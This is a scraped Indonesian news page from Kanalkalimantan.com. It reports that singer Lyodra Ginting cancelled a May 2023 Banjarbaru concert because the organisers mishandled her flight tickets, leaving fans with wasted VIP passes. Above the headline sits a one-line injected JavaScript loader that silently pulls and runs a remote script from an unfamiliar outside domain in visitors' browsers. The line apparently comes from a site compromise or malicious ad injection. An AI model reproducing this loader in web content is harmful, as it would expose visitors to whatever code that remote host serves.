(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

‘Sang Dewi’ Lyodra Batal Manggung di Banjarbaru Gegara Panitia, Beli Tiket VIP All Days Pass Jadi Sia-sia


KANALKALIMANTAN.COM, BANJARBARU – Lyodra Ginting dijadwalkan akan mengisi salah satu acara musik di Banjarbaru, ibu kota Provinsi Kalimantan Selatan (Kalsel) pada Minggu (7/5/2023) malam tadi.

Namun, ternyata penyanyi jebolan Indonesian Idol 2020 itu dikabarkan batal pentas. Konser musik yang berlangsung di lapangan Sat Brimob Polda Kalsel Banjarbaru itu pun memicu kemarahan penonton hingga netizen.

Melalui story instagramnya, Lyodra membeberkan kejadian batal manggungnya itu terjadi lantaran tak adanya kepastian oleh pihak penyelenggara acara mengenai tiket penerbangan yang akan dia bersama crew gunakan untuk berangkat menuju Banjarbaru.

“Dari beberapa hari lalu manager aku sudah selalu mengkonfirmasi mengenai tiket penerbangan pesawat, tetapi tidak ada kepastian dari pihak penyelenggara dan hampir setiap hari manager saya update mengenai tiket pesawat, padahal administrasi sudah dibayarkan lunas,” tulis Lyly, sapaan akrabnya Lyodra dalam unggahan story Instagram lyodraofficial pada Minggu (7/5/2023) malam.

Baca juga:Pelabuhan Trisakti Catat 32 Ribu Penumpang Mudik-Balik Lebaran 2023 

Setelah sekian hari menunggu kepastian, manajemen Lyodra pun baru mendapatkan update mengenai tiket penerbangan sehari sebelum konser berlangsung yakni pada tanggal 6 Mei 2023 pukul 10 malam.

Lyly juga membeberkan jika perwakilan penyelenggara memberikan pilihan waktu keberangkatan Lyodra di waktu yang berbeda dengan timnya.

“Jadi ada di jam 06.00 – 09.10 dan 11.50 -18.15. Disitu kita semua setuju akan hal tersebut asalkan kita jadi berangkat namun sampai pagi tadi tgl 7 Mei 2023 aku dan tim belum mendapatkan kepastian tiket,” ungkapnya.

Ketidakpastian itu masih belum mendapat perhatian dari pihak penyelenggara hingga akhirnya sponsor utama ikut turun tangan mengurus keberangkatan artis. Padahal diketahui sponsor utama tidak bertugas mengurus talent atau artis.

“Pihak penyelenggara kemudian share tiket untuk penerbangan jam 11.50 untuk lima orang dan sisanya sekitar jam 6 sore, aku dan team 5 orang ini langsung berangkat ke bandara secepat mungkin, pas aku sampai di bandara ternyata pesawat sudah mundur dan mencoba cari flight di jam lain dan maskapai lain semua sudah full untuk penerbangan ke Banjarbaru,” jelasnya.

Penonton konser musik ini pun mengungkapkan kekecewaan mendalam lantaran gagal melihat langsung penyanyi tembang ‘Sang Dewi’ ini di depan mereka.

Baca juga: BREAKING NEWS. Batola Terbanyak Pertama Angka Stunting di Kalsel

Banyak dari mereka mengaku sudah memesan tiket konser dari jauh-jauh hari dan bahkan rela berangkat dari luar pulau, namun nyatanya mereka harus merelakan tiketnya itu.

“Apa yang direncanakan gugur satu persatu, bukan cuma aku yang jauh-jauh datang dari Kota Palangkaraya. Mesan tiket VIP dari bulan Februari, tiba-tiba di hari H batal karena tidak ada kejelasan tiket pesawat artisnya,” ucap Nella Darnia, fans Lyodra Ginting asal Kota Palangkaraya, Kalimantan Tengah.

Terlebih Mylyodra Banjarmasin, official fanbase Lyly di Banjarmasin juga telah menyiapkan kejutan bucket bunga yang bertuliskan ‘Selamat Datang Ke Banjarmasin Lyodra Ginting dari Mylyodra Banjarmasin.

Kejutan itu pun rencanakan akan diberikan kepada Lyodra saat dirinya berada di atas panggung. Namun, sayangnya mereka gagal untuk memberikannya.

“Sakit hati, kami sudah effort untuk nonton hari itu, beli tiket VIP All Days Pass untuk nonton Lyodra aja. Jadi gak worth it sama sekali tiket ku terbuang sia-sia, kalau murah ya gak papa,” ujar Fauza Kamil, salah seorang Mylyodra Banjarmasin.

Mereka pun mengaku kecewa dengan perlakuan penyelenggara acara musik terhadap idolanya tersebut.

“Gak malu kah? Harusnya malu sih karena sampai dikomen sama Mama Lyly. Malu sama semua artis lain dan timnya yang batal datang hanya karena tiket pesawat,” tekannya.

Baca juga: Malam Ini Puncak Haul ke-85 Tuan Guru Kasyful Anwar Kampung Melayu

Melalui storynya juga, Natalia Jo, ibunda Lyodra ternyata mengungkapkan kekecewaannya atas perlakukan yang dilakukan kepada putrinya itu.

“Semua dibuat panik, sepertinya penyelenggara perlu pelatihan dua semester buat menghandle acara. Cukup sekali ini aja diprank acara yang dihandle panitia abal-abal, mereka pikir Lyly tinggalnya di pintu bandara,” tulis Natalia Jo, ibunda Lyodra dalam unggahan story instagramnya @nataliajo23.

Atas kejadian ini pula Lyly mengungkapkan jika dirinya ingin sekali pergi manggung ke Banjarbaru.

“Udah ngebut jalan, padahal aku tuh pengen banget ke sana, sampai sini tuh ternyata udah berangkat (pesawatnya) gatau sih emang udah kacau aja kali ya, cuma gara-gara tiket pesawat,” sebut Lyly saat dihubungi melalui saluran video oleh fanbasenya.

Karena kondisi yang sudah ia dan timnya usahakan tersebut terjadi di luar kendali Lyly pun hanya bisa mengucapkan permintaan maaf terhadap fansnya di Banjarmasin. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Risa

Recent Posts

Syarat Dukungan Ditolak, Bakal Calon Perseorangan Pilwali Banjarmasin Ajukan Sengketa ke Bawaslu

KANALKALIMANTAN.COM, BANJARMASIN - Di awal tahapan Pemilihan Wali Kota dan Wakil Wali Kota (Pilwali) Banjarmasin… Read More

8 jam ago

ETLE Segera Terpasang di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah titik krusial pelanggaran lalu lintas dan kerawanan kecelakaan lalu lintas menjadi… Read More

9 jam ago

Dinas PUPR Kalsel Gelar Bimtek Pengelolaan Air Limbah

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Provinsi Kalsel mengadakan kegiatan Bimbingan… Read More

9 jam ago

Rekomendasi Partai Tak Pasti, Jaya-Abdi Siap Jadi Penantang Petahana Aditya-Yuti

Jaya : Penantang Bisa Lebih dalam Mengevaluasi Kinerja Petahana Read More

10 jam ago

Lima Jabatan di Polres Banjarbaru Rotasi, 12 Personel Terima Penghargaan Kapolda

KANALKALIMANTAN.COM, BANJARBARU - Lima jabatan yang diisi para perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

11 jam ago

Nurgita Tiyas Berharap Guru Dapat Lebih Cakap Digital

KANALKALIMANTAN.COM, BANJARMASIN - Ketua TP PKK Kabupaten Banjar Hj Nurgita Tiyas menghadiri Talkshow Literasi Digital… Read More

11 jam ago

This website uses cookies.